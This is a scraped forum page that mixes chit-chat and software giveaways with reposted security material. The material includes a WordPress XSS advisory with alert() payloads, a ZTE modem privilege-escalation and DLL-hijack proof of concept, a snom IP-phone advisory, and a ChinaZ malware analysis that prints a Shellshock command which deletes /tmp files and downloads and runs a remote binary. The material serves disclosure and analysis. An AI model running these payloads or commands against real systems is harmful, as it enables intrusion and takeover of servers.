Aerosol

@Nytro au disparut butoanele de like? o.O pana acum 5 minute erau...

@hirosima daca e sa aleg dupa ce ai zis tu ( intre cele doua modele ) ia un lenovo p780. Daca vrei parerea mea ia-ti un ZTE Tania ( Windows Phone ) si aia e. Se misca extrem de rapid, nu se blocheaza sau sa ai alte probleme Camera de 5 MP. Eu am un ZTE de 2 ani ( WP ) si nu am avut nici macar o data probleme, e foarte rezistent.

@AGSQ se sterg constant pentru o mai buna functionare a forumului! apropo nu mai dati [tag]staff ca nu are rost

Ashampoo Photo Card allows you to easily turn photos and images into stunning, custom greeting cards — with just a few clicks. Want more features? Then get Ashampoo Photo Card 2 with free updates, the latest and greatest version of Ashampoo Photo Card! Sale ends in 1 day 13 hrs 02 mins Free Ashampoo Photo Card (100% discount)

WinOrganizer is a full-scale personal information manager (PIM) that helps you organize and plan your business and personal life. It’s a planner, notepad, address book and more combined in one powerful application Free WinOrganizer (100% discount)

Advisory ID: HTB23244 Product: Simple Security WordPress Plugin Vendor: MyWebsiteAdvisor Vulnerable Version(s): 1.1.5 and probably prior Tested Version: 1.1.5 Advisory Publication: December 17, 2014 [without technical details] Vendor Notification: December 17, 2014 Public Disclosure: January 14, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2014-9570 Risk Level: Low CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) Solution Status: Solution Available Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered two XSS vulnerabilities in Simple Security WordPress plugin, which can be exploited to perform Cross-Site Scripting attacks against administrators of WP websites with the vulnerable plugin. 1) Two Cross-Site Scripting (XSS) Vulnerabilities in Simple Security Wordpress Plugin: CVE-2014-9570 The discovered vulnerabilities can be used by attackers to steal administrator's cookies of a vulnerable website. This can lead to total website compromise. Attackers can also perform drive-by-download attacks against website admin by injecting malware or exploit-packs into vulnerable scripts. 1.1 User-supplied input passed via the "datefilter" HTTP GET parameter to "/wp-admin/users.php" script is not properly sanitised before being returned to the administrator. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in his browser in the context of the vulnerable website. The exploitation example below uses the "alert()" JavaScript function to display "ImmuniWeb" word: http://[host]/wp-admin/users.php?page=access_log&datefilter=%27%22%3E%3Cscript%3Ealert%28/ImmuniWeb/%29;%3C/script%3E 1.2 User input passed via the "simple_security_ip_blacklist[]" HTTP POST parameter to "/wp-admin/users.php" script is not properly filtered before being returned to the administrator. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. Below we provide a basic XSS exploit that uses JS "alert()" function to display "ImmuniWeb" pop-up: <form action="http://[host]/wp-admin/users.php?page=ip_blacklist" method="post" name="main"> <input type="hidden" name="page" value="access_log"> <input type="hidden" name="action" value="add_blacklist_ip"> <input type="hidden" name="simple_security_ip_blacklist[]" value="'><script>alert('ImmuniWeb');</script>"> <input type="submit" id="btn"> </form> ----------------------------------------------------------------------------------------------- Solution: Disclosure timeline: 2014-12-17 Vendor Alerted via contact form. 2014-01-02 Vendor Alerted via contact form and emails. 2014-01-12 Fix Requested via contact form and emails. 2014-01-14 Public disclosure with self-written patch. Currently we are not aware of any official solution for this vulnerability. Unofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23244-patch.zip ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23244 - https://www.htbridge.com/advisory/HTB23244 - Two XSS vulnerabilities in Simple Security WordPress plugin. [2] Simple Security Wordpress Plugin - http://mywebsiteadvisor.com/ - Simple Security Plugin for WordPress is a basic Access Log system that can monitor successful and failed login attempts and block IP addresses. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. Source

The ABCS of Death 2 (2014) Mischief Night 2014 (2014) Recomand.

What Is Process Hacker? Process Hacker is a free, open source, graphical tool for managing 32-bit and 64-bit Microsoft Windows processes, services, threads, memory, handles, modules, Security Access Tokens (SATs) and network connections. It is a wonderful tool for analyzing and combating malware, understanding low-level details of the Windows operating system, troubleshooting, and experimenting with Windows in ways which Microsoft never intended. Process Hacker is similar to the famous Sysinternals Process Explorer tool from Microsoft, but open source and a bit more fun (http://www.microsoft.com/sysinternals). Now that Process Explorer is the property of Microsoft Corporation, Process Explorer cannot be enhanced with features which might be used to circumvent security restrictions or otherwise embarrass Microsoft. There are also no legal hassles when redistributing Process Hacker or its source code (no Microsoft lawyers = good thing). Examining the source code of Process Hacker is an interesting way to learn more about Windows internals, and Process Hacker itself is an actively maintained project. Fortunately, if you prefer Process Explorer, almost all of this presentation applies to it as well. So please feel free to use Process Hacker or Process Explorer as you wish. Both tools are great. And if you have questions, don't forget about the discussion forums for Process Hacker (Process Hacker Forums - Index page) and Sysinternals Process Explorer (Sysinternals Forums). Read more: http://alexandreborgesbrazil.files.wordpress.com/2014/01/process_hacker_sans_jason_fossen.pdf

ABSTRACT There are lot of things around us to give comfort but we sometime misuse them. In this topic we would be covering how a Bluetooth is being hacked and cause security issue. The main objective of this presentation is about Bluetooth hacking, the impact and prevention. Further we will focus on how Bluetooth hacking is done, different categories of Bluetooth hack, threat a business can face and its prevention. When we hear term hacking, we usually think it’s attached with computer only. Now your computers are not only hacked but your Bluetooth can be hacked too. This is one of the big drawbacks of Bluetooth. There are different types of hacking such as Bluejacking, Bluesnarfing, Bluebugging, Bluetoothing, Blueprinting etc. The purpose of this entire Bluetooth hacking is to hack your phone and your privacy. Bluetooth hacking takes place because of security lacking in Bluetooth technology. If someone hack your Bluetooth in that case hacker can steal your contacts, personal files, pictures, restore factory setting or they can use your phone for calling and using internet. Beside this they can access international mobile equipment identity number (IMEI), which they can use for cloning your cell phone. When your cell phone is cloned then your messages can be sent to other numbers. It will impact the business world. Mobile, while providing great opportunity, also provides security and risks. Companies need to protect their consumers in order to remain credible and reliable, for this, selection of the appropriate security policies for all Bluetooth capable devices will impact your business. This frequently includes handheld devices owned by employees. To avoid the fraudulent use of the corporate data, we need to follow some protocols: Keep BT in the disabled state and device in non-discoverable mode. Use non regular patterns as PIN keys while pairing a device. Register your device at the Manufacturer site and insure that security updates are installed regularly to protect from previously known threat which had been rectified in new models. Proper security testing will provide customer satisfaction as well as increase company’s business Read more: http://www.larsentoubro.com/lntcorporate/common/ui_templates/pdf/Bluetooth%20hacking%20and%20its%20Prevention%202014.pdf

D&D = Description & Detection C&C = Command & Control Why this talk? - to explain advanced communication channel used by modern malware; - to explain how to correctly detect and contain attacks (to be blind in your network is the worst situation); - to show strength of Suricata; - to show why incident response team should work with network team; - and … Read more: http://2014.hack.lu/archive/2014/hacklu-joker-presentation.pdf

Part 1. Introduction Ponemon Institute is pleased to present the findings of The SQL Injection Threat Study sponsored by DB Networks. The purpose of this research is to understand how organizations respond to the SQL injection threat and their awareness about different approaches to managing this risk. The study surveyed 595 individuals who work in IT and IT security. The majority of respondents are familiar with core IDS technologies that detect rogue SQL statements on the network that connect the web application to the database. SQL injections have been defined as being used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injections exploit security vulnerabilities in an application’s software. SQL injection is most commonly known as an attack vector through public facing websites but can be used to attack SQL databases in a variety of ways. The most salient findings are shown below: ? The SQL threat is taken seriously because 65 percent of organizations represented in this study experienced a SQL injection attack that successfully evaded their perimeter defenses in the last 12 months. ? Almost half of respondents (49 percent) say the SQL injection threat facing their company is very significant. On average, respondents believe 42 percent of all data breaches are due, at least in part, to SQL injections. ? Many organizations are not familiar with the techniques used by cyber criminals. Less than half of respondents (46 percent) are familiar with the term Web Application Firewalls (WAF) bypass. Only 39 percent of respondents are very familiar or familiar with the techniques cyber criminal use to get around WAF perimeter security devices. ? BYOD makes understanding the root causes of an SQL injection attack more difficult. Fiftysix percent of respondents say determining the root causes of SQL injection is becoming more difficult because of the trend for employees to use their personally owned mobile devices (BYOD) in the workplace. Another challenge, according to 41 percent of respondents, is increasing stealth and/or sophistication of cyber attackers. ? Expertise and the right technologies are critical to preventing SQL injection attacks. While respondents see the SQL threat as serious, only 31 percent say their organization’s IT security personnel possess the skills, knowledge and expertise to quickly detect a SQL injection attack and 34 percent agree that they have the technologies or tools to quickly detect a SQL injection attack. ? Measures to prevent SQL injection attacks are also lacking. Despite concerns about the threat, 52 percent do not take such precautions as testing and validating third party software to ensure it is not vulnerable to SQL injection attack. ? Organizations move to a behavioral analysis solution to combat the SQL injection threat. Eighty-eight percent of respondents view behavioral analysis either very favorably or favorably. Read more: http://www.dbnetworks.com/pdf/ponemon-the-SQL-injection-threat-study.pdf

• 10 CFR 72.42(a), 72.240©: ? TLAAs that demonstrate that ITS SSCs will continue to perform their intended function for the period of extended operation. ? A description of the AMP for management of issues associated A description of the AMP for management of issues associated with aging that could adversely affect ITS SSCs. • Guidance: NUREG-1927 AMP Elements: 1. Scope of the Program 2. Preventive Actions 3. Parameters Monitored/Inspected 6. Acceptance Criteria 7. Corrective Actions 8. Confirmation Process 4. Detection of Aging Effects 5. Monitoring and Trending 9. Administrative Controls 10. Operating Experience Read more: http://pbadupws.nrc.gov/docs/ML1419/ML14192A702.pdf

Anatomy of botnet Planning the protections against botnets, companies should take into consideration the principle known in the military world, described more than two thousand years ago by Sun Tzu in e Art of War: “If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also su!er a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.” Understanding a botnet’s anatomy is key to e!ective defense against it. A description of communication and main components of a botnet is presented in gure 2. Read more: http://www.clico.pl/services/practical-defense-in-depth-protection-against-botnets

Contents 1 Foreword 2 Introduction: Malware Evolves in 2013 4 Botnets Grow in Size and Stealth Ì 2013 ZeroAccess Trend: Damaged by sinkholing, but rebounded rapidly.............................................................................5 Ì ZeroAccess Detections by Country...................................................6 Ì Botnet Bitcoin Mining..............................................................................6 7 Android Malware: Mutating and Getting Smarter Ì Most Widespread Android Malware Detections, October 2013 .............................................................................................8 Ì Anatomy of a Hacked Mobile Device: How a hacker can profit from your smartphone..........................9 10 Linux: Pivotal Technology, Attracting Criminals 12 Mac OS X: A Year of Many Small Attacks Ì 4 Easy Ways to Protect Your Mac ....................................................13 14 Web-Based Malware: More Sophisticated, Diverse and Hidden Ì Exploit Kits: Blackhole falls behind improved models.............15 Ì Zbot Spreading Across the Globe ....................................................16 Ì Tips for Protecting Your Web Server and Clients ......................17 18 Targeted Threats to Your Financial Accounts 20 Windows: The Growing Risk of Unpatched Systems 22 Spam Reinvents Itself Ì Spam Attachments, June 2013: Loading plenty of trouble...23 24 SophosLabs: Staying Ahead of Today’s Most Sophisticated Attacks 26 Trends to Watch in 2014 29 The Last Word Ì Sources ..................................................................................................... 30 Read more: http://www.sophos.com/en-us/threat-center/medialibrary/PDFs/other/sophos-security-threat-report-2014.pdf

What This Talk is All About ?! ? Learning about the different insights gathered from real-time testing of C&C panels ? Understanding the facts and C&C design of botnet families ? Zeus / ICE 1X/ Citadel / BetaBot etc. ? Busting several myths about C&C architecture and deployments ? Learning what methods to follow when direct exploitation is not possible ? Utilizing multiple vulnerabilities to attack C&C panels ? Gathering information using weak C&C configurations ? Building C&C intelligence for Incident Response and automated solutions Read more: http://www.secniche.org/blackhat-2014/blackhat_2014_briefings_presentation_exp_cc_flaws_adityaks.pdf

1. INTRODUCTION Nowadays, one of the main threats that the Internet users face are botnets. Botnets are employed for many kind of malicious activities; examples are DDoS, personal data theft, spam, bitcoin mining, and cyber-espionage [19][9]. In the last ten years, the main antivirus vendors have reported a constant growth of botnets in the wild [1][2]. Traditionally, botnets are centralised overlay networks where the Command-and-Control (C&C) servers act as single point of control. Centralised botnets are easy to manage and maintain due to their centralised structure. A botmaster has a clear overview of the overlay network and she manages the bots, which, in turn, connect to the C&C servers to be reachable. Nevertheless, this architecture has an important drawback: the C&C servers are exposed and represent a single point of failure. Hence, by taking down the C&C servers, the whole botnet is defeated. In order to overcome this problem, botmasters have moved to more resilient unstructured P2P Read more: https://ccdcoe.org/cycon/2014/proceedings/d3r2s3_casenove.pdf

This bot code was liberated from the Lizard Squad. Link packet storm Link: https://github.com/pop-pop-ret/lizkebab/

The ELF's VT is: https://www.virustotal.com/en/file/92fd1971f7ac512d096821a4bf8553bc13d1c478680999dd2e15400fe8973793/analysis/ Out initial draft report: https://pastebin.com/raw.php?i=gf4xrB9n This threat was detected just recently, via attacks via shellshock: /bin/bash -c \"rm -rf /tmp/*;echo wget http://xxxx:81/9521 -O /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh; chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://xxxx:81/9521 -O /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" The above request was reported to be generated from Windows version of the shellshock scanner binary with the below trace: VT is: https://www.virustotal.com/en/file/ae677c48a6fdd79129bde3b5321bc4c3cd95c20e63302ad98afadeef64514d5f/analysis/ < noted: LOW detection.. .rdata:0057D808 aBinBashCRmRfTm db '() { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget %s -O /tmp/China' .rdata:0057D808 ; DATA XREF: StartAddress+124o .rdata:0057D808 db '.Z-%s >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chm' .rdata:0057D808 db 'od 777 /tmp/China.Z-%s >> /tmp/Run.sh;echo /tmp/China.Z-%s >> /tm' .rdata:0057D808 db 'p/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Ru' .rdata:0057D808 db 'n.sh;/tmp/Run.sh"',0 The ELF payload was served in a hacked windows system served this ELF with the HFS server: The calls, subs & function name is obfuscated, yet some new uniq typical characteristics can be spotted like below for the detection purpose: registration for the autostart is using /etc/rc.local modification: sed -i -e '/exit/d' /etc/rc.local sed -i -e '2 i//ChinaZ' /etc/rc.local It hammered SE Linux, using hosts.conf - resolve.conf - and libnss as DNS resolver, and generated the backdoor is as per below, noted: not necessarily using hostname basis. SYSCALL5A, send(3, "cM\1\0\0\1\0\0\0\0\0\0\2aa\5gm352\3com\0\0\1\0\1", 30, MSG_NOSIGNAL) SYSCALL5B, recvfrom(3, "cM\201\200\0\1\0\1\0\5\0\5\2aa\5gm352\3com\0\0\1\0\1\300\f"..., 1024, 0, $PARAMS:{sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("202.238.95.24")}, [16]) SYSCALL5C, connect(3, {sa_family=AF_INET, sin_port=htons(9521), sin_addr=inet_addr("121.12.173.173")}, 16) SYSCALL5D, write(3, "\0\0\0\0Linux2.6.2-4-686-\0\275w\267\0\1\0\0"..., 168) = 168 In this particular sample it calls CNC in aa.gm352.com (121.12.173.173:9521) at ASN 58543 | 121.12.168.0/21 | CHINATELECOM-HUNAN-H $ my_lookup aa.gm352.com aa.gm352.com. 300 IN A 121.12.173.173 gm352.com. 3600 IN NS ns4.he.net. gm352.com. 3600 IN NS ns3.he.net. gm352.com. 3600 IN NS ns2.he.net. gm352.com. 3600 IN NS ns1.he.net. gm352.com. 3600 IN NS ns5.he.net. $ mycnccheck 121.12.173.173:9521 Connection to 121.12.173.173 9521 port [tcp/*] succeeded! IPv4 TCP MMD.KickUR.ASS:36555->121.12.173.173:9521 (ESTABLISHED) Due to the unique new infection pair shellshock (scanner-payload), new functions & new signature used, we consider this is a new China DDOSer variant: "ChinaZ" 9521.7z Pass: infected Source

Multiple successors of the original Silk Road have come and all have been taken offline in recent years, but aside from selling illegal goods and services, they all have had one thing in common – they've all relied on the Tor network. A new version of the anonymous online black market Silk Road, has re-appeared on the dark web, but this time the website doesn't rely on the now infamous Tor network and neither it deals in only Bitcoins. The new version of the notorious online black market, dubbed "Silk Road Reload?ed", launched Sunday on the little-known "I2P" anonymous network, dealing with a range of cryptocurrencies including the meme-inspired Dogecoin. In short, apart from the name, there is no connection between the original Silk Road website and the newly launched Silk Road Reloaded. Silk Road Reloaded is only accessible by downloading the special software called I2P (Invisible Internet Project), or by configuring your systems in such a way that it connects to I2P web pages with .i2p suffix. Just like the Tor network, I2P also lets users browse websites and send messages anonymously. Another key difference between the original Silk Road and Silk Road Reloaded is the fact that the new site accepts more than just Bitcoins as a form of payment. Silk Road Reloaded deals in a total of eight different forms of cryptocurrency, including Darkcoin, Dogecoin, and Anoncoin, with more along the way. These are two of the biggest differentiators between the new Silk Road and its ancestors. Silk Road Reloaded has most of the illicit unmentionables you'd expect from an online black market, save for weapons and stolen credit card credentials, something which some Tor sites, such as Evolution, now sell in abundance, Motherboard reported. /When Silk Road 2.0 was taken down in November last year, black markets struggled to search an alternative to set up their shop. Probably they switch to I2P network because the Tor network had been compromised several times and targeted by the U.S. government. Silk Road Reloaded has seemingly found a possible answer. I2P websites require special software to access them and do not appear on the Google searches, circumventing surveillance from Internet service providers (ISPs) and government agencies. Although it operates in a similar way to the Tor browser, I2P or “eepsites” are believed to offer increased security. The creator of the Silk Road Reloaded has been promoting it on the Silk Road section of Reddit, saying: "I've built a great platform and it speaks for itself." Source

?/* * Exploit Title:ZTE Datacard MF180 PCW_TNZNZLMF180V1.0.0B02 (Telecom MF180 Modem) Insecure Permissions Local Privilege Escalation & PoC Local crash & Path Subversion Arbitrary DLL Injection Code Execution (mms_dll_r.dll) * Date: 10/01/2015 * Author: Hadji Samir s-dz@hotmail.fr * Link soft:http://www.zte.co.nz/downloads/software/MF180_PC_Install.exe * Vendor: http://www.zte.co.nz/main/Product_Downloads/MF180_downloads.htm http://www.zte.com.cn/ * Tested on: windows 7 FR * Thanks Anna ############################# Insecure Permissions Local Privilege Escalation ################################################ Technical Details & Description: ================================ A local privilege escalation vulnerability has been discovered in the official ZTE Datacard mobiconnect application software. The local security vulnerability allows an attackers to gain higher access privileges by execution of arbitrary codes. The application is vulnerable to an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the `F` flag (full) for the `Everyone`(Tout le monde:F) and `Users` group, for the all binary file. The files are installed in the `Ucell Internet` directory which has the Everyone group assigned to it with full permissions making every single file inside vulnerable to change by any user on the affected machine. After you replace the binary with your rootkit, on reboot you get SYSTEM privileges. Proof of Concept (PoC): ======================= The vulnerability can be exploited by local attackers with restricted account privileges and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. --- PoC Session Logs --- C:\Users\s-dz>cacls "C:\Program Files\Telecom Connection Manager" C:\Program Files\Telecom Connection Manager Tout le monde:F Tout le monde:(OI)(CI)(IO)F NT SERVICE\TrustedInstaller:(ID)F NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F AUTORITE NT\Système:(ID)F AUTORITE NT\Système:(OI)(CI)(IO)(ID)F BUILTIN\Administrateurs:(ID)F BUILTIN\Administrateurs:(OI)(CI)(IO)(ID)F BUILTIN\Utilisateurs:(ID)R BUILTIN\Utilisateurs:(OI)(CI)(IO)(ID)(accès spécial GENERIC_READ GENERIC_EXECUTE CREATEUR PROPRIETAIRE:(OI)(CI)(IO)(ID)F C:\Users\s-dz> 2- ########################### PoC Local crash ########################################################## first go to C:\program files\Internet Mobile\NetworkCfg.xml (Network configuration) and write "A" * 3000 in <ConfigFileName>"A" x 3000</ConfigFileName> . Save it open the program . poc will crash ........... ########################################################################################################## 3-########################Path Subversion Arbitrary DLL Injection Code Execution (mms_dll_r.dll)####################### ZTE Modems is prone to a flaw in the way it loads dynamic-link libraries (mms_dll_r.dll). The program uses a fixed path to look for specific files or libraries. This path includes directories that may not be trusted or under user control. By placing a custom version of the file or library in the path, the program will load it before the legitimate version. This allows a local attacker to inject custom code that will be run with the privilege of the program or user executing the program.This attack can be leveraged remotely in some cases by placing the malicious file or library on a network share or extracted archive downloaded from a remote source. This can be done by tricking a user into opening an unspecified file from the local file system or a USB drive in some cases */ #include <windows.h> BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: owned(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } int owned() { MessageBox(0, "ZTE DLL Hijacked\Hadji Samir", "POC", MB_OK); } Source

SEC Consult Vulnerability Lab Security Advisory < 20150113-0 > ======================================================================= title: Multiple critical vulnerabilities product: snom IP phones vulnerable version: all firmware versions <8.7.5.15, all firmware branches of all snom desktop IP phones (3xx, 7xx, 8xx, etc) are affected fixed version: 8.7.5.15 (for all desktop phones) impact: critical homepage: http://www.snom.com found: 2014-10-24 by: Johannes Greil, Stefan Viehböck SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor description: =================== "snom technology AG develops and manufacturers Voice-over-IP (VoIP) telephones based on open standard for enterprise communications. [...] The devices are suitable for use in all business environments ranging from home offices to small- and medium-sized enterprises and large corporations. snom also works directly with carriers, Internet Service Providers, and OEM customers. The company is globally present through branch offices and a partner network." source: http://www.snom.com/en/company/about-snom/ "snom phones (hardware and software) are developed in Germany and strictly adhere to all applicable security standards (TLS and SRTP). In contrast to many of our competitors, snom as a German manufacturer is required to abide by the strict German data protection regulations and laws. This is of considerable importance for the prevention of phone-tapping." source: http://www.snom.com/en/company/statement/security/ Business recommendation: ======================== A short security crash test resulted in multiple critical security vulnerabilities within all desktop IP phones of snom and all firmware versions. There exist highly critical attack vectors as the IP phones can be completely compromised (root) by an external attacker. It is possible to e.g. * add a backdoor to the system which will even survive a factory reset! * remotely activate the built-in microphone in order to surveil the room where the phone is located, * tap into phone calls made or received by the compromised phone (e.g. by installing a sniffer on the phone), * redirect phone numbers to premium rate numbers which may result in high costs, * use the phone as a jump-host into the internal network and attack other systems. It is highly recommended by SEC Consult not to use this product until a thorough security review of the firmware has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: =================================== 1) Multiple cross site scripting vulnerabilities ------------------------------------------------ The device's web interface suffers from multiple reflected & stored cross site scripting vulnerabilities, which may allow an attacker to gain unauthorized access to the admin interface and further compromise the phone. 2) Path traversal filter bypass ------------------------------- The firmware has a rudimentary filter against path traversal attacks within URL parameters. E.g. "../" characters within a parameter value will be filtered. This can be easily bypassed and potentially exploited for further attacks on the system (e.g. XML minibrowser or action URL features). 3) Directory traversal & privilege escalation --------------------------------------------- It is possible to directly access the file system via path/directory traversal attacks within the URL. In order to exploit it, a certain file extension has to be added and cut off via a null byte which must not be transmitted in URL encoded form. Attackers are then able to easily gain access to sensitive files such as the snom phone configuration file which includes all passwords in cleartext, even for the admin user account (admin mode) which should not be accessible to a low privileged user. 4) Command execution via VPN profiles ------------------------------------- The phone's firmware supports OpenVPN profiles and the configuration can be uploaded via a tarball from a remote webserver. Admin access in the web GUI is needed which can be gained by exploiting other vulnerabilities, such as 3) and 5). By combining more identified vulnerabilities, even a remote attacker would be able to compromise the internal phone, e.g. add a XSS payload via CSRF in order to gain access to the admin mode password, then install the malicious OpenVPN profile. The attacker can prepare a malicious OpenVPN configuration file with shell commands in order to execute arbitrary commands on the IP phone with highest access rights on the operating system (root). There exist highly critical attack vectors after gaining root access to the phone: * add a backdoor to the system which will even survive a factory reset! * remotely activate the built-in microphone in order to surveil the room where the phone is located, * tap into phone calls made or received by the compromised phone, * use the phone as a jump-host into the internal network and attack other systems, * etc. This can also be exploited via TR069 or auto provisioning by a man-in-the-middle attacker! This can be achieved via the attacks described in 8). 5) Authentication bypass & privilege escalation ----------------------------------------------- Unprivileged users (non-admin accounts) have the ability to change the settings for functions keys or action URLs on the phone. Attackers are able to exploit those features in order to gain administrative access rights on the web GUI and then exploit further vulnerabilities again, e.g. 4). The webserver does not check for any user credentials when accessed via localhost. By reconfiguring a function key or action URL to submit a request to localhost, it is possible to alter any configuration setting, e.g. overwrite the current admin-mode password and therefore gain admin access rights! This vulnerability is also automatically exploitable via CSRF, local access to the phone (e.g. for pressing a function key) is _not_ required! Further short tests have shown, that an attacker could also use the request for altering the settings by directly accessing the IP address over the network. The bypass via localhost was not necessary. This can be achieved by sending the same malicious request multiple times. 6) Cross-site request forgery issues ------------------------------------ Attackers are able to remotely change settings, e.g. the admin mode password, on the device via CSRF attacks. Furthermore, it is possible to initiate arbitrary phone calls, e.g. to premium rate numbers, via CSRF! Short tests have shown that the anti-CSRF feature "use_hidden_tags" was not effective in the tested firmware version. 7) Remote firmware update by unprivileged users ----------------------------------------------- Unprivileged users are able to perform a firmware update via the web GUI. This is also exploitable for a remote attacker using CSRF! A local attacker could otherwise just simply boot the phone. An attacker would potentially be able to downgrade to a certain older firmware, in order to make older security bugs for exploitation available again. The phone presents the unprivileged user an error message, that admin access is required. But the phone will automatically perform the firmware update anyways! 8) Plaintext provisioning through snom servers & weak device identifier ----------------------------------------------------------------------- Every IP phone contacts the provisioning server of snom at "provisioning.snom.com" (IP: 80.237.155.31) for an initial setup phase or after a factory reset in order to retrieve the auto-provisioning URL for the TR069 server of the ISP. This connection is not secured and uses plaintext HTTP communication. Man-in-the-middle attackers (e.g. TAO/QUANTUM attacks, DNS or BGP hijacking, etc.) can manipulate those requests, use their own TR069 server and install a backdoor on the phone (e.g. see 4) and afterwards provide the real TR069 URL for the ISP. The backdoor will survive the new settings/resets or firmware updates and be available to the attacker. Furthermore, the phone identifies itself only via the last three bytes of the MAC address, which can easily be brute-forced. An attacker would be able to retrieve all TR069 URLs of the ISPs and he could then potentially further attack those systems. Proof of concept: ================= Detailed proof of concept information has been removed from this advisory. This section will hence only give an overview regarding the vulnerabilities. 1) Multiple cross site scripting vulnerabilities ------------------------------------------------ The following payload can be used within the [removed] parameter in order to permanently store JavaScript within [removed]. This is also possible by importing [removed] contents via CSV files: [payload removed] The following URL automatically adds a new entry to the phonebook which contains JS code. This is also exploitable via CSRF to automatically insert malicious code without user interaction: [URL removed] The following URL is also exploitable because the webserver does not filter error messages. Browsers that do not url-encode the input are affected (e.g. older IE versions such as v6): [URL removed] 2) Path traversal filter bypass ------------------------------- In order to bypass the "../" filter, the following can be used as an example: [payload removed] The string [removed] at the end is necessary, otherwise the basename will be duplicated by the system. 3) Directory traversal & privilege escalation --------------------------------------------- The following URL can be used to gain access to the file /etc/passwd by combining a real null byte (not URL encoded %00), e.g. by using burp proxy hex mode, with certain appended file extensions: [URL removed] The following URL allows an attacker access to SIP credentials, admin mode password and other configuration settings in plaintext of the snom config.xml file: [URL removed] 4) Command execution via VPN profiles ------------------------------------- The following OpenVPN profile can be used in order to open a reverse shell to the attacker's system. The attacker will gain the highest access rights on the phone (root): dev tun proto tcp script-security 2 remote $someArbitraryOpenVPNIP 443 cipher AES-128-CBC auth SHA1 tls-verify [payload removed] resolv-retry infinite nobind persist-key persist-tun client verb 3 [...] In order to exploit it, any publicly available OpenVPN server can be misused with any credentials, as the payload is already executed during the initial TLS setup phase. It is easily possible to install a backdoor on the phone because the flash storage is writable. SEC Consult tested this by altering the init script "[removed]" and added a SSH daemon (as an example, any command can be run) which will be started on each boot. The init script does not get overwritten even after a factory reset, hence the backdoor can still be accessed afterwards. Attackers with root access can now completely compromise the phone, e.g. alter the configuration in order to enable call redirection to premium rate numbers, access the microphone, install a sniffer in order to record incoming/outgoing phone calls, or attack other internal systems, etc. 5) Authentication bypass & privilege escalation ----------------------------------------------- By using the following URL to localhost as a so-called "action URL" associated to a function key on the device, it is possible to gain administrative access rights because the admin-mode password will be set to an attacker-controlled value: [URL removed] This also works when "restrict_uri_queries" and "use_hidden_tags" are set to "on", sometimes the function key has to be pressed multiple times then. See vulnerability 6) for infos on how to "press" the function key remotely via CSRF. By requesting the following URL with the direct IP address (not localhost) repeatedly, it was also possible to gain access to admin mode: [URL removed] 6) Cross-site request forgery issues ------------------------------------ The following URL can be used for CSRF attacks in order to initiate phone calls to arbitrary numbers (e.g. premium rate): [URL removed] The following URL will change the function key setting in order to change the admin mode password (see 5) via CSRF: a) URL for setting the function key value: [URL removed] URL for saving the function key modifications: [URL removed] c) URL for automatically executing the command of the function key "P1": [URL removed] By exploiting other issues in combination with CSRF, such as XSS and the OpenVPN command execution flaw, it is possible to remotely compromise the phone via CSRF. 7) Remote firmware update by unprivileged users ----------------------------------------------- The following URL can be used in order to load another firmware onto the device. The device will immediately switch to the firmware download mode even when accessed as unprivileged user, although the phone prints an error message that admin-mode access is required: [URL removed] 8) Plaintext provisioning through snom servers & weak device identifier ----------------------------------------------------------------------- No proof of concept necessary, wireshark shows plaintext communication. Vulnerable / tested versions: ============================= The IP phone snom 710 has been tested during a short security evaluation crash test with firmware version 8.7.4.7a pre-installed. Snom confirmed that _all_ older firmware versions are affected by the documented security 